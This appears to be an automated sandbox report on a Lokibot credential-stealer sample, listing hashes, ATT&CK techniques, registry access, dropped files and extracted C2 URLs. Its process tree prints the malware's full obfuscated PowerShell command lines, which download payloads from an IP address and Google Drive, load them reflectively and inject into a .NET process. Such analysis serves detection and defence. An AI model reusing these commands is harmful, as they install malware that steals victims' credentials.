lokibot | fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-10-2024 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta
Size

204KB
MD5

9dbf5ee2610284f5668fb229ba474b95
SHA1

12b3f4c93e36b9bca1bfecf8fa522748d3631c74
SHA256

fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0
SHA512

06fe1b0e3ca4e04108fa8a50f60867e42f38e60768aebbc8935a7c24b973cf3546f6f7f4548e9fac67cebe552319d7323fee5eeaa87dc5f958aa23377cb3ccb2
SSDEEP

96:Eac75KAtf7aRNeKmo4T5vc1IPqCwFifcu7T:EaA52RNevpJVfZT

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Extracted

Family

lokibot

http://94.156.177.220/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 4 IoCs

Processes:

pOweRSheLl.ExEpowershell.exe

flow pid process

17 3360 pOweRSheLl.ExE
29 4808 powershell.exe
31 4808 powershell.exe
38 4808 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3696 powershell.exe
4808 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

pOweRSheLl.ExEpowershell.exe

pid process

3360 pOweRSheLl.ExE
3424 powershell.exe

flow	pid	process
17	3360	pOweRSheLl.ExE
29	4808	powershell.exe
31	4808	powershell.exe
38	4808	powershell.exe

pid	process
3696	powershell.exe
4808	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

28 drive.google.com
29 drive.google.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4808 set thread context of 2580 4808 powershell.exe aspnet_regbrowsers.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
28	drive.google.com
29	drive.google.com

description	pid	process	target process
PID 4808 set thread context of 2580	4808	powershell.exe	aspnet_regbrowsers.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

pOweRSheLl.ExEpowershell.execsc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRSheLl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies registry class 1 IoCs

Processes:

pOweRSheLl.ExE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings pOweRSheLl.ExE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	pOweRSheLl.ExE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

pOweRSheLl.ExEpowershell.exepowershell.exepowershell.exe

pid	process
3360	pOweRSheLl.ExE
3360	pOweRSheLl.ExE
3424	powershell.exe
3424	powershell.exe
3696	powershell.exe
3696	powershell.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

pOweRSheLl.ExEpowershell.exepowershell.exepowershell.exeaspnet_regbrowsers.exe

description	pid	process
Token: SeDebugPrivilege	3360	pOweRSheLl.ExE
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2580	aspnet_regbrowsers.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exepOweRSheLl.ExEcsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 5000 wrote to memory of 3360	5000	mshta.exe	pOweRSheLl.ExE
PID 5000 wrote to memory of 3360	5000	mshta.exe	pOweRSheLl.ExE
PID 5000 wrote to memory of 3360	5000	mshta.exe	pOweRSheLl.ExE
PID 3360 wrote to memory of 3424	3360	pOweRSheLl.ExE	powershell.exe
PID 3360 wrote to memory of 3424	3360	pOweRSheLl.ExE	powershell.exe
PID 3360 wrote to memory of 3424	3360	pOweRSheLl.ExE	powershell.exe
PID 3360 wrote to memory of 4100	3360	pOweRSheLl.ExE	csc.exe
PID 3360 wrote to memory of 4100	3360	pOweRSheLl.ExE	csc.exe
PID 3360 wrote to memory of 4100	3360	pOweRSheLl.ExE	csc.exe
PID 4100 wrote to memory of 3592	4100	csc.exe	cvtres.exe
PID 4100 wrote to memory of 3592	4100	csc.exe	cvtres.exe
PID 4100 wrote to memory of 3592	4100	csc.exe	cvtres.exe
PID 3360 wrote to memory of 1116	3360	pOweRSheLl.ExE	WScript.exe
PID 3360 wrote to memory of 1116	3360	pOweRSheLl.ExE	WScript.exe
PID 3360 wrote to memory of 1116	3360	pOweRSheLl.ExE	WScript.exe
PID 1116 wrote to memory of 3696	1116	WScript.exe	powershell.exe
PID 1116 wrote to memory of 3696	1116	WScript.exe	powershell.exe
PID 1116 wrote to memory of 3696	1116	WScript.exe	powershell.exe
PID 3696 wrote to memory of 4808	3696	powershell.exe	powershell.exe
PID 3696 wrote to memory of 4808	3696	powershell.exe	powershell.exe
PID 3696 wrote to memory of 4808	3696	powershell.exe	powershell.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe
PID 4808 wrote to memory of 2580	4808	powershell.exe	aspnet_regbrowsers.exe

outlook_office_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_regbrowsers.exe

outlook_win_path 1 IoCs

Processes:

aspnet_regbrowsers.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_regbrowsers.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fcc1b8c11b5cae212cbdb9b7aaa083da59ccab319816d7ef8e37c2856347b0f0.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5000
- C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
  "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lmo1znnf\lmo1znnf.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEE9.tmp" "c:\Users\Admin\AppData\Local\Temp\lmo1znnf\CSCAB1494AE2903413FA15831CCF3E7F1D9.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3592
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3696
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4808
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRSheLl.ExE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
f3c84c537b2af42d634febd23aa9c5e4

SHA1
261cf3b7102d6fbc85226e6d611194c5fc10e0fb

SHA256
d3b8348e7028f2b744f2b75da9f3dd5451a3ebe75dc2096d911a51db0ff6c6db

SHA512
448da0f23adb7159f49a55894826c3163614c185797a9b2b425a4a4095dfe920a54708c9096e03cced9ac1f83495f92aab838119d2ad319a0578fef58fb8c3db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7182d7efce1080778afe908d54d988d5

SHA1
ab57f68d2209b1c24421b8ed89bc6b31c5402d26

SHA256
f072b3a7f30f953694185d90b94bed2f989a0eadca974a8b3fa668933afee634

SHA512
8de104666da75cc9ca21e7d52f706076895e3c9a1a5c13340963a8865d43dd4ea99ecc506910dc13a647dde20b3e0b6d73714f107a44631f3e059e7e16e62d43

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCEE9.tmp

Filesize
1KB

MD5
1eeaba2189a459477483f32b0ad265ae

SHA1
eb89bf1c29efba16e255ca50b0141ed12e5c888f

SHA256
5cd1f05c3a8d2f635d0f6c707503bab83c1a872e1df845f78542560fca83b50b

SHA512
e09857944696316d8bbd1c5ed959b06c96fadc0bfac8bf36a9aa5d2ba40500c071b5abfc4891e77884ec27d317c4ea5279a89a85035b6a704e6067031cb115c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eu2ja2fx.lfa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lmo1znnf\lmo1znnf.dll

Filesize
3KB

MD5
a11e9608b567577bcee2418dd9515b47

SHA1
2a7936de08c005bda0bce2292afc6dcef6d510fd

SHA256
4f06878dc03245d1f935e10b706c8da71e64409338aa89621e8900b5c5122507

SHA512
5d826029a0e4adffb7d794137bbb11eff55cd3ad13f67c46a152a8a894e11ff922cd7e81ac22914e392a3875e2a0a0cca205c4482c53d24a9bba1e929aa2897d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3442511616-637977696-3186306149-1000\0f5007522459c86e95ffcc62f32308f1_5ab270f5-f3a9-47d1-97d7-bbd50acf9955

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Filesize
136KB

MD5
74339d80989d10693dbc1115d1cf3eb4

SHA1
bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44

SHA256
a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d

SHA512
4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lmo1znnf\CSCAB1494AE2903413FA15831CCF3E7F1D9.TMP

Filesize
652B

MD5
137ba315a7beac4a48d21345d5f8cd43

SHA1
43f13d50c142ca638ba7500b080edb4338de6608

SHA256
cb1c01e5e76fa4b90bf09ca569b56b812358973001bd3f12a019d91d616259cd

SHA512
ccba7ecf8d5850cda429e3a1a43d11c95d87f00cfce5e37b628ec1cc5563bb3a00f3c0391e02650525cf29163f996be728cc22b052670b2762e180c8894b9c4d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lmo1znnf\lmo1znnf.0.cs

Filesize
480B

MD5
ce22e90871744b25a04ac8c5691f49cc

SHA1
bc0a93c1fe61e00daa34774994b638d19f735228

SHA256
3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546

SHA512
5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lmo1znnf\lmo1znnf.cmdline

Filesize
369B

MD5
520263b8b87f1d951477ecbd91fa23b3

SHA1
66bd0fcf31a23628685511b6f46a05e801dd144b

SHA256
c1426e96ea1974fc88722963793f026c0d36ea24886f3daed8ed80e64505aeb9

SHA512
669b6407103fcbfa50bf769d03c9e781e7ee5880ce87a66a1f7126647a0f23963f445f9550eea66bf179145350dc12a95bad111f062bdb689cc57db39941b7ba

Download Submit
memory/2580-137-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2580-105-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2580-129-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/2580-104-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3360-19-0x0000000006690000-0x00000000066DC000-memory.dmp

Filesize
304KB

Download
memory/3360-18-0x0000000006650000-0x000000000666E000-memory.dmp

Filesize
120KB

Download
memory/3360-73-0x00000000709CE000-0x00000000709CF000-memory.dmp

Filesize
4KB

Download
memory/3360-0-0x00000000709CE000-0x00000000709CF000-memory.dmp

Filesize
4KB

Download
memory/3360-81-0x00000000709C0000-0x0000000071170000-memory.dmp

Filesize
7.7MB

Download
memory/3360-4-0x00000000709C0000-0x0000000071170000-memory.dmp

Filesize
7.7MB

Download
memory/3360-3-0x0000000005760000-0x0000000005D88000-memory.dmp

Filesize
6.2MB

Download
memory/3360-7-0x0000000005FF0000-0x0000000006056000-memory.dmp

Filesize
408KB

Download
memory/3360-74-0x00000000709C0000-0x0000000071170000-memory.dmp

Filesize
7.7MB

Download
memory/3360-5-0x00000000056B0000-0x00000000056D2000-memory.dmp

Filesize
136KB

Download
memory/3360-17-0x0000000006060000-0x00000000063B4000-memory.dmp

Filesize
3.3MB

Download
memory/3360-6-0x0000000005F80000-0x0000000005FE6000-memory.dmp

Filesize
408KB

Download
memory/3360-2-0x00000000709C0000-0x0000000071170000-memory.dmp

Filesize
7.7MB

Download
